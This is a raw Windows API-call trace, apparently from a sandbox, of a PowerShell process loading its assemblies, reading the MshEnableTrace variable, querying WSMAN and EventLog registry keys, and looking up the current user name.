	[0178.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0178.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0178.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0178.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0178.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0191.477] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0191.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.477] CoTaskMemFree (pv=0x2e4430) 
	[0191.479] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0191.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.479] CoTaskMemFree (pv=0x2e4430) 
	[0191.480] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0191.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.480] CoTaskMemFree (pv=0x2e4430) 
	[0191.481] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0191.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.481] CoTaskMemFree (pv=0x2e4430) 
	[0191.959] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0191.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.959] CoTaskMemFree (pv=0x2e4430) 
	[0192.341] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0192.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.341] CoTaskMemFree (pv=0x2e4430) 
	[0192.342] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0192.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.342] CoTaskMemFree (pv=0x2e4430) 
	[0192.723] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd3a8 | out: phkResult=0xbd3a8*=0x198) returned 0x0
	[0192.822] RegQueryInfoKeyW (in: hKey=0x198, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xbd2ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd2a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xbd2ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd2a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0192.822] CoTaskMemFree (pv=0x0) 
	[0192.823] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0192.823] RegEnumValueW (in: hKey=0x198, dwIndex=0x0, lpValueName=0x32d910, lpcchValueName=0xbd358, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xbd358, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0192.823] CoTaskMemFree (pv=0x32d910) 
	[0192.823] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0192.823] RegEnumValueW (in: hKey=0x198, dwIndex=0x1, lpValueName=0x32d910, lpcchValueName=0xbd358, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xbd358, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0192.823] CoTaskMemFree (pv=0x32d910) 
	[0192.823] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0192.823] RegEnumValueW (in: hKey=0x198, dwIndex=0x2, lpValueName=0x32d910, lpcchValueName=0xbd358, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xbd358, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0192.823] CoTaskMemFree (pv=0x32d910) 
	[0192.824] RegQueryValueExW (in: hKey=0x198, lpValueName="StackVersion", lpReserved=0x0, lpType=0xbd33c, lpData=0x0, lpcbData=0xbd338*=0x0 | out: lpType=0xbd33c*=0x1, lpData=0x0, lpcbData=0xbd338*=0x8) returned 0x0
	[0192.824] CoTaskMemAlloc (cb=0xc) returned 0x2dfb10
	[0192.824] RegQueryValueExW (in: hKey=0x198, lpValueName="StackVersion", lpReserved=0x0, lpType=0xbd30c, lpData=0x2dfb10, lpcbData=0xbd308*=0x8 | out: lpType=0xbd30c*=0x1, lpData="2.0", lpcbData=0xbd308*=0x8) returned 0x0
	[0192.824] CoTaskMemFree (pv=0x2dfb10) 
	[0195.658] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd2f8 | out: phkResult=0xbd2f8*=0x160) returned 0x0
	[0195.658] RegQueryInfoKeyW (in: hKey=0x160, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xbd1fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd1f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xbd1fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd1f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0195.658] CoTaskMemFree (pv=0x0) 
	[0195.658] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0195.658] RegEnumValueW (in: hKey=0x160, dwIndex=0x0, lpValueName=0x32d910, lpcchValueName=0xbd2a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xbd2a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0195.658] CoTaskMemFree (pv=0x32d910) 
	[0195.658] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0195.658] RegEnumValueW (in: hKey=0x160, dwIndex=0x1, lpValueName=0x32d910, lpcchValueName=0xbd2a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xbd2a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0195.658] CoTaskMemFree (pv=0x32d910) 
	[0195.658] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0195.658] RegEnumValueW (in: hKey=0x160, dwIndex=0x2, lpValueName=0x32d910, lpcchValueName=0xbd2a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xbd2a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0195.658] CoTaskMemFree (pv=0x32d910) 
	[0195.659] RegQueryValueExW (in: hKey=0x160, lpValueName="StackVersion", lpReserved=0x0, lpType=0xbd28c, lpData=0x0, lpcbData=0xbd288*=0x0 | out: lpType=0xbd28c*=0x1, lpData=0x0, lpcbData=0xbd288*=0x8) returned 0x0
	[0195.659] CoTaskMemAlloc (cb=0xc) returned 0x1b7793a0
	[0195.659] RegQueryValueExW (in: hKey=0x160, lpValueName="StackVersion", lpReserved=0x0, lpType=0xbd25c, lpData=0x1b7793a0, lpcbData=0xbd258*=0x8 | out: lpType=0xbd25c*=0x1, lpData="2.0", lpcbData=0xbd258*=0x8) returned 0x0
	[0195.659] CoTaskMemFree (pv=0x1b7793a0) 
	[0195.660] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0195.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.660] CoTaskMemFree (pv=0x2e4430) 
	[0196.485] CoTaskMemAlloc (cb=0x104) returned 0x2e4430
	[0196.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.486] CoTaskMemFree (pv=0x2e4430) 
	[0200.355] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd328 | out: phkResult=0xbd328*=0x164) returned 0x0
	[0200.358] RegQueryInfoKeyW (in: hKey=0x164, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xbd29c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd298, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xbd29c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd298*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.359] CoTaskMemFree (pv=0x0) 
	[0200.359] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.359] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x0, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.359] CoTaskMemFree (pv=0x32d910) 
	[0200.359] CoTaskMemFree (pv=0x0) 
	[0200.359] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.359] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x1, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.359] CoTaskMemFree (pv=0x32d910) 
	[0200.359] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x2, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x3, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x4, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x5, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x6, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x7, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0200.360] RegEnumKeyExW (in: hKey=0x164, dwIndex=0x8, lpName=0x32d910, lpcchName=0xbd328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xbd328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.360] CoTaskMemFree (pv=0x32d910) 
	[0200.360] CoTaskMemFree (pv=0x0) 
	[0200.360] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x31c) returned 0x0
	[0200.361] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0200.361] RegOpenKeyExW (in: hKey=0x164, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x320) returned 0x0
	[0200.361] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0200.361] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x328) returned 0x0
	[0200.361] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0200.361] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x304) returned 0x0
	[0200.361] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0200.361] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x308) returned 0x0
	[0200.361] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0200.361] RegOpenKeyExW (in: hKey=0x164, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x30c) returned 0x0
	[0200.361] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0200.361] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x5
	[0201.722] RegOpenKeyExW (in: hKey=0x164, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x1d0) returned 0x0
	[0201.723] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x0) returned 0x2
	[0201.723] RegOpenKeyExW (in: hKey=0x164, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x330) returned 0x0
	[0201.723] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd388 | out: phkResult=0xbd388*=0x334) returned 0x0
	[0201.723] RegCloseKey (hKey=0x334) returned 0x0
	[0201.723] RegCloseKey (hKey=0x164) returned 0x0
	[0201.724] RegCloseKey (hKey=0x330) returned 0x0
	[0201.819] CoTaskMemAlloc (cb=0x804) returned 0x1b795b80
	[0201.819] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b795b80, nSize=0xbd598 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xbd598) returned 0x1
	[0201.820] CoTaskMemFree (pv=0x1b795b80) 
	[0201.821] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0201.821] GetUserNameW (in: lpBuffer=0x32d910, pcbBuffer=0xbd5d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xbd5d8) returned 1
	[0201.822] CoTaskMemFree (pv=0x32d910) 
	[0202.953] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd2d8 | out: phkResult=0xbd2d8*=0x338) returned 0x0
	[0202.953] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xbd24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xbd24c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xbd248*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.953] CoTaskMemFree (pv=0x0) 
	[0202.953] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.953] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.953] CoTaskMemFree (pv=0x32d910) 
	[0202.953] CoTaskMemFree (pv=0x0) 
	[0202.953] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.953] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.953] CoTaskMemFree (pv=0x32d910) 
	[0202.953] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] CoTaskMemAlloc (cb=0x204) returned 0x32d910
	[0202.954] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x32d910, lpcchName=0xbd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xbd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0202.954] CoTaskMemFree (pv=0x32d910) 
	[0202.954] CoTaskMemFree (pv=0x0) 
	[0202.954] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x33c) returned 0x0
	[0202.954] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.955] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x340) returned 0x0
	[0202.955] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.955] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x344) returned 0x0
	[0202.955] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.955] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x348) returned 0x0
	[0202.955] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.955] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x34c) returned 0x0
	[0202.955] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.955] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x350) returned 0x0
	[0202.955] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
	[0202.955] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x5
	[0202.966] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x354) returned 0x0
	[0202.966] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd338 | out: phkResult=0xbd338*=0x0) returned 0x2
